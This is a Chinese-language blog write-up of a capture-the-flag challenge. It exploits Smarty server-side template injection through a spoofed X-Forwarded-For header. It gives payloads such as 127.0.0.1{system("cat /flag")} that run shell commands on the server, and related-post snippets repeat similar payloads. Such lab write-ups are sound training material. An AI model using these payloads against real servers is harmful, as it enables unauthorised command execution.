BUUCTF-The mystery of ip【Smarty-SSTI模板注入】

最新推荐文章于 2024-06-29 16:50:32 发布
最新推荐文章于 2024-06-29 16:50:32 发布
阅读量1.1k 收藏
点赞数
分类专栏: 渗透测试 BUUCTF 文章标签: ssti 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58784379/article/details/120643157
版权

当点击flag的时候,弹出ip地址

怀疑需要利用X-Forwarded-For伪造127.0.0.1绕过

使用bp抓包,增加X-Forwarded-For:127.0.0.1,重放

似乎只是将ip回显?通过XFF头来获取信息的,这个IP的值受XFF头控制 。将XFF头改为{2*2}会发现该位置的值变为了4,便可以确定这里存在SSTI

payload:X-Forwarded-For:127.0.0.1{system("ls")}

查看当前目录下的flag.php内是否藏有flag,可惜并不包含

查看根目录

X-Forwarded-For:127.0.0.1{system("ls /")}

获得falg

payload:X-Forwarded-For:127.0.0.1{system("cat /flag")}

bbb07
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-模板注入专项刷题
m0_51563147的博客
02-27 3388
SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行,但是题目过滤的不够严格导致.
22-郑康鹏-The Mystery Machine:End-to-end performance analysis of la
08-04
《The Mystery Machine:大型互联网服务端到端性能分析》 这篇论文出自2014年11月6日至8日在科罗拉多州布鲁姆菲尔德举行的第11届USENIX操作系统设计与实现研讨会。该研讨会的论文集由USENIX协会赞助并开放获取,...
[BJDCTF2020]The mystery of ipssti模板注入题目)
m0_55109452的博客
06-02 1783
项目场景: 链接http://node3.buuoj.cn:29669/index.php 问题描述: 观察页面找到三个链接,点开flag和hint看看,发现flag那个页面窃取了客户端的ip地址,这题的题目是“The mystery of ipIP的神秘,看来解题是要从这里入手了。 尝试解决: 既然是窃取了IP,考虑是不是XFF或Client-IP这两个header,发现这个IP确实可控,0.0,感觉可以冲了 我想到的第一个就是之前看到的sql注入的http头注入,但是也只是想想罢了,再看看其他方
SSTI注入漏洞
大河之犬的博客
06-05 1007
服务器端模板注入是一种漏洞,当攻击者可以将恶意代码注入到在服务器上执行的模板中时发生Jinja是一种常用的用于Web应用程序的模板引擎。在这段易受攻击的代码中,用户请求中的 name 参数直接通过 render 函数传递到模板中。这可能允许攻击者向 name 参数中注入恶意代码,导致服务器端模板注入。将负载注入到name参数中。此负载可以包含Jinja模板指令,使攻击者能够执行未经授权的代码或操纵模板引擎,潜在地控制服务器。
[BJDCTF2020]The mystery of ip--SSTI模板注入
weixin_52653109的博客
05-20 281
根据题目名“IP”,结合访问反馈ip,不难想到X-Forwarded-for (下简称:XFF) 一、通过尝试修改XFF,发现XFF可控 二、模板注入尝试 存在模板渲染。 尝试写入:X-Forwarded-for:${“z”.join(“ab”)} 发现报错返回中 “smarty模板 关于SSTI前辈们的解释已经很详细,就不献丑了。 SSTI 基础讲解 SSTI 进阶讲解 三、payload 抓包修改 X-Forwarded-for:{{system(“ls”)}} 返回目录 flag.p
buuctf题目the mystery of ip
m0_65853019的博客
06-29 107
有三个按钮,flag点击后发现页面窃取客户端的IP地址,通过给出的github代码中的php文件发现可以通过XFF或Client-IP传入值。使用hackbar或BP。经系列测试知道是smart注入Smarty是一个PHP的模板引擎,提供让程序逻辑和页面显示(HTML/CSS)代码分离的功能。
BUUCTF之[BJDCTF2020]The mystery of ip ----- SSTI注入
weixin_44632787的博客
06-21 214
BUUCTF之[BJDCTF2020]The mystery of ip 题目 知识点 SSTI smarty X-Forwarded-For 右键查看源代码,发现有3个可疑的链接:index.php,flag.php,hint.php 最后经过测试定位到flag.php这个页面,结果发现有提示IP地址啥。所以盲猜可能是和XFF(X-Forwarded-For)相关的题目 通过BurpSuite抓包改一下数据看看 好吧,一度陷入了深思。。。于是跑去看了看别人的WP。发现这题涉及到SSTI和sma
smarty模版 [BJDCTF2020]The mystery of ip 1
m0_75178803的博客
12-06 609
本来联想到XFF漏洞引起的sql注入,但是我们无论输入什么都会正常回显,就联想到ssti注入。我们看到smarty_internal_templatecompilerbase.php。可以看到用的是smartySmarty 是一个用于 PHP 的模板引擎。点击hint,查看源代码处告诉了我们要利用这个ip。bp抓包,并添加X-Forward-For头。点击flag给了我们一个ip。{config}来看看配置。
[BJDCTF2020]The mystery of ip1
whale_waves的博客
11-23 1217
当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。漏洞触发的原因未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。
[BJDCTF2020]The mystery of ip (SSTI smarty X-Forwarded-For
shannidawang的博客
09-11 126
查看FLAG 提示我们关注ip 测试{7*7} 查看下目录 cat /flag X-Forwarded-For:{system("cat /flag")}
[BJDCTF2020]The mystery of ip
weixin_64659753的博客
05-26 641
[BJDCTF2020]The mystery of ip (php ssti模块注入)
The Mystery of Legend-开源
06-28
《神秘的传说——开源》是一款深受玩家喜爱的JRPG风格游戏,它的开源特性为开发者和玩家带来了无限的可能性。本文将深入探讨开源软件的概念及其在游戏开发中的应用,以及《神秘的传说》如何利用这一特点来增强游戏...
sql-murder-mystery
04-07
sql-murder-mystery我们存储库中的重要文件: index.html:采用HTML和Javascript编写的游戏内容的工作模板(Julia) styles.css:index.html的样式(Julia) database.sql:一旦创建,我们将复制到后端的数据库架构...
TL-Events:TheLounge活动机器人
04-05
TL-Events源代码虽然您可能想自己运行该机器人。 请注意,出于安全和隐私原因,有些文件尚未上传。什么是TL事件? TL Events是一个Discord机器人,它是为在TheLoungeMC的Discord服务器上运行Discord事件而创建的。...
笔记222222222222222222222222222222
最新发布
08-04
笔记222222222222222222222222222222
仿拉钩App小程序.rar
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
华云智慧园区.rar
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
新浪读书.rar
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值